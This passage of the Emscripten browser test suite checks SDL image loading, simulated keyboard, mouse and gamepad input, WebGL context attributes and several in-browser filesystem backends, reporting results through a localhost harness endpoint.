shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
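# Injects reftest.js into the generated test.html and delays window.close so the reftest
# runs once the final frames have been rendered.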
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
@no_wasm_backend('This modifies JS code with regexes in such a way that does not currently work in WASM2JS')
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
return ['-s', 'ASYNCIFY']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the attributes we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will still succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {antialias: true});
var attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {depth: true});
var attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {stencil: true});
var attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {alpha: true});
var attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
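# With --js-library, the functions merged into LibraryManager.library above become callable
# from the C test code as ordinary extern functions (e.g. a declaration along the lines of
# `int webglAntialiasSupported(void);` on the C side).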
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
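# A minimal sketch (an assumption about the shell file, which is not shown here) of how a
# page can hand over a ready-made context when GL_PREINITIALIZED_CONTEXT=1 is used:
#   var canvas = document.getElementById('canvas');
#   Module['preinitializedWebGLContext'] = canvas.getContext('webgl');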
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', 0, args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
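# FS.syncfs(true, ...) above only pulls persisted IndexedDB state into MEMFS before main()
# runs; pushing changes back the other way is done with FS.syncfs(false, ...), which the
# test's fsync calls presumably trigger on the C side.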
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
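# WORKERFS exposes the given Blob/File objects read-only under /work (as /work/blob.txt and
# /work/file.txt here), so the C code can read them without first copying them into MEMFS.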
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc; -s LZ4=1 makes emcc tell the file packager to use LZ4
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
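# (each file is 10 * 1024 * 128 = 1,310,720 bytes, plus the single extra byte in file3.txt,
# hence 3 * 1024 * 128 * 10 + 1 in total; the repetitive text files compress very well under
# LZ4, which is what lets the packaged test.data drop below half the raw size)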
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. The client receives compressed data and can just use it; this is the typical usage.
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
